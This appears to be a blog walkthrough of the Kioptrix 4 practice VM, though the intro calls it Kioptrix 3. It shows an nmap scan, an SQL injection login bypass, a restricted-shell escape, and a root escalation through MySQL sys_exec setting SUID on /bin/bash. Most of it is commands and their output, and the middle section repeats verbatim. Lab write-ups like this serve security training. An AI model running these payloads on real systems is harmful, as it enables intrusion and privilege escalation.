In order to start this machine, we must start a new VMWare Workstation machine, and then power it off. Next up, we must copy the image of the .vmdk file into the folder of Kioptrix 3.
After you have successfully booted the machine, you must do a netdiscover and figure out the IP address of the machine. For example, the IP address I have obtained is: 192.168.1.77
Next, do an nmap on the machine using a service scan.
nmap -A -sV -p- 192.168.1.77
Nmap scan report for 192.168.1.77 Host is up (0.00059s latency). Not shown: 39528 closed ports, 26003 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA) |_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP) MAC Address: 00:0C:29:EC:FC:75 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -5h00m00s, deviation: 2h49m42s, median: -7h00m00s |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.28a) | Computer name: Kioptrix4 | NetBIOS computer name: | Domain name: localdomain | FQDN: Kioptrix4.localdomain |_ System time: 2019-07-13T06:55:04-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE HOP RTT ADDRESS 1 0.59 ms 192.168.1.77 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.94 seconds
Let's try going to port 80 of the web server and to see what we get back.
Using dirbuster, we can find some interesting usernames here.
robert and john
http://192.168.1.77:80/robert/robert.php
http://192.168.1.77/john/john.php
We can now try our hands at a SQL injection bypass by using:
' or 1=1 #Now, for the login page, just use:
username: robert
password:
' or 1=1 #username: john
password:
' or 1=1 # For each of the usernames, we have entered, there is a sql injection bypass for each of the usernames we have tried.
For robert, here is the password, we get:
ssh robert@192.168.1.77 with the password, ADGAdsafdfwt4gadfga==
After ssh-ing, we are given a limited shell.
Use echo os.system("/bin/bash") to escape the limited shell.
root@kali:~# ssh robert@192.168.1.77
robert@192.168.1.77's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ ?
cd clear echo exit help ll lpath ls
robert:~$ echo os.system("/bin/bash")
Now, we have an escaped shell.
robert@Kioptrix4:~$
Now, let's check out whether Kioptrix4 has some SQL passwords hidden in the web directory.
Let's cd (change directories) into /var/www
robert@Kioptrix4:~$ cd /var/www/
Inside the /var/www/, the directory includes the sql password for the SQL database system.
john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
ob_end_flush();
?>
Since there is no password for root, we can see that we can just login to the root account of sql by doing a:
mysql -u root
This is a seriously misconfigured root account.
Once we have root, we must run this:
SELECT sys_exec('chmod u+s /bin/bash'); to set the /bin/bash command to have root privileges.
mysql> SELECT sys_exec('chmod u+s /bin/bash');
+---------------------------------+
| sys_exec('chmod u+s /bin/bash') |
+---------------------------------+
| NULL |
+---------------------------------+
1 row in set (0.01 sec)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> quit
Bye
bash-3.2$ bash -p
Here's what bash -p means:
If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, no startup files are read, shell functions are not inherited from the environment, the SHELLOPTS variable, if it appears in the environment, is ignored, and the effective user id is set to the real user id. If the -p option is supplied at invocation, the startup behavior is the same, but the effective user id is not reset.
bash-3.2# whoami
root
bash-3.2# id
uid=1001(john) gid=1001(john) euid=0(root) groups=1001(john)
bash-3.2# cd /root
bash-3.2# ls
congrats.txt lshell-0.9.12
bash-3.2# cat congrats.txt
Congratulations!
You've got root. And, popped a r00t shell.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
K33p F1ND1N6 0-days.
root@kali:~# ssh robert@192.168.1.77
robert@192.168.1.77's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ ?
cd clear echo exit help ll lpath ls
robert:~$ echo os.system("/bin/bash")
Now, we have an escaped shell.
robert@Kioptrix4:~$
Now, let's check out whether Kioptrix4 has some SQL passwords hidden in the web directory.
Let's cd (change directories) into /var/www
robert@Kioptrix4:~$ cd /var/www/
Inside the /var/www/, the directory includes the sql password for the SQL database system.
john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
ob_end_flush();
?>
Since there is no password for root, we can see that we can just login to the root account of sql by doing a:
mysql -u root
This is a seriously misconfigured root account.
Once we have root, we must run this:
SELECT sys_exec('chmod u+s /bin/bash'); to set the /bin/bash command to have root privileges.
mysql> SELECT sys_exec('chmod u+s /bin/bash');
+---------------------------------+
| sys_exec('chmod u+s /bin/bash') |
+---------------------------------+
| NULL |
+---------------------------------+
1 row in set (0.01 sec)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> quit
Bye
bash-3.2$ bash -p
Here's what bash -p means:
If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, no startup files are read, shell functions are not inherited from the environment, the SHELLOPTS variable, if it appears in the environment, is ignored, and the effective user id is set to the real user id. If the -p option is supplied at invocation, the startup behavior is the same, but the effective user id is not reset.
bash-3.2# whoami
root
bash-3.2# id
uid=1001(john) gid=1001(john) euid=0(root) groups=1001(john)
bash-3.2# cd /root
bash-3.2# ls
congrats.txt lshell-0.9.12
bash-3.2# cat congrats.txt
Congratulations!
You've got root. And, popped a r00t shell.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
K33p F1ND1N6 0-days.
No comments:
Post a Comment